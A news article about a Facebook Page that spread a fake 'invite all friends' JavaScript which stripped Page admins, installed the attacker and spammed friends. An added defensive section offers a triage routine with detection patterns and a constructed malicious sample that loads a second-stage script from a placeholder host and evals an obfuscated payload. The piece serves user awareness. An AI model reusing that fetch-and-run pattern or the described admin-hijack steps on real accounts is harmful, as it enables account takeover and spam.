When you have a Facebook event and want to invite all your Friends, it can get very tedious, especially if you have lots of Friends. There have been a number of shortcuts, in the form of JavaScript snippets floating around the internet, that let you invite all your friends with one click.

Often the published JavaScript stops working after a short time, and users end up on Google trying to find a new working script.

This is a much-needed option that Facebook does not provide, for the obvious reason that it would be abused for spam.

Now one hacker in Albania has taken users' need for a one-click 'invite all' JavaScript and turned it into malware. The malware is on a Facebook Page called: How To Make "Suggest To Friends" New Javascript. The title would lead you to believe that the script will invite all your friends to an event. However, after you enter the script into the address bar a whole host of nasty things happen. The reason is simple: a script pasted into the address bar while you are logged in runs inside your Facebook session with every permission you have, so it can do anything you could do yourself, including to any Page you administer.

We were alerted to the malware by Roeland Landegent from Shoudio and TodaysArt. A colleague from TodaysArt had fallen victim whilst trying to invite Friends to an event hosted on its Page. The script had removed all the admins and replaced them with the malicious site owner.

This is what else Landegent told us the JavaScript did; it:

  • Collects a list of friends of the user
  • Collects a list of all pages the current user administers
  • Loops through this list of pages and removes all administrators (which an administrator is allowed to do)
  • Makes a new administrator of the pages by assigning the role to an email address (which corresponds to a Facebook user)
  • Posts a message to your friends promoting an Albanian site.
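Nothing in that list exploits a bug in Facebook; every step is an action the victim's own account was entitled to perform, which is why the script only needed to be pasted and run. The practical check is therefore to read a script before pasting it. The following is an added example, not the script from the Page and not code from anyone quoted here: a small triage routine that flags indicators a legitimate "invite all" helper has no reason to contain (script loading from a non-Facebook host, obfuscation via eval/atob, cookie access, or anything touching Page admins). The trusted-host list, the indicator patterns and both sample snippets are constructed assumptions for illustration.

```javascript
// Added example: heuristic triage of a script a user is about to paste into
// the browser address bar. The sample inputs below are constructed, not the
// real malicious script; the indicator list is an assumption about what a
// benign "invite all" helper does not need, not a definition of malware.

// Assumption: an event-invite helper only needs to talk to Facebook itself.
const TRUSTED_HOSTS = ["facebook.com", "fbcdn.net"];

// Each indicator is something an invite-all script has no reason to do.
const INDICATORS = [
  { name: "obfuscation",   re: /\b(eval|Function|atob|unescape)\s*\(/ },
  { name: "cookie-access", re: /document\.cookie/ },
  { name: "admin-change",  re: /admin/i },
];

// Pull every http(s) host referenced in the script text.
function extractHosts(src) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(src)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

function isTrusted(host) {
  return TRUSTED_HOSTS.some(t => host === t || host.endsWith("." + t));
}

// Returns the list of findings and a simple risky/not-risky verdict.
function triage(src) {
  const findings = [];
  for (const ind of INDICATORS) {
    if (ind.re.test(src)) findings.push(ind.name);
  }
  const foreign = extractHosts(src).filter(h => !isTrusted(h));
  if (foreign.length > 0) findings.push("foreign-host:" + foreign.join(","));
  return { findings, risky: findings.length > 0 };
}

// Constructed benign sample: ticks every checkbox in the invite dialog and
// never leaves the page.
const BENIGN_SAMPLE =
  "javascript:(function(){var b=document.querySelectorAll('input[type=checkbox]');" +
  "for(var i=0;i<b.length;i++){b[i].click();}})();";

// Constructed malicious sample: loads a second-stage script from a foreign
// host, decodes an obfuscated payload with eval(atob()), and references
// Page admins. The host example.invalid is a placeholder, not a real site.
const MALICIOUS_SAMPLE =
  "javascript:(function(){var s=document.createElement('script');" +
  "s.src='http://example.invalid/hook.js';document.body.appendChild(s);" +
  "eval(atob('cmVtb3ZlQWRtaW5zKCk='));/* removeAdmins */})();";

function demo() {
  return { benign: triage(BENIGN_SAMPLE), malicious: triage(MALICIOUS_SAMPLE) };
}
```

A clean result does not prove a script is safe (a determined author can hide a host or an eval behind string concatenation), but a single hit is reason enough not to paste it; the malicious sample above trips three of the four indicators at once.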

After losing control of their Facebook Page, Landegent went on to track down the culprit. In the process he learned from the hacker that thousands of people fall victim to the malicious script every day. Luckily, Landegent was able to regain control of the Page.

Here is a conversation Landegent recorded with the Albanian; watch out for the amusing talk of hip hop used to engage the hacker in returning what was stolen:

The most chilling part of that conversation is when the rapper-hacker says:

“I discovered that facebook.com allowed many thinks [things] that destroy the other accounts”

The malicious script has been removed from that Page, but it is unknown in how many other places the JavaScript is still hosted.

(This is the JavaScript you must avoid, on Pastie.org)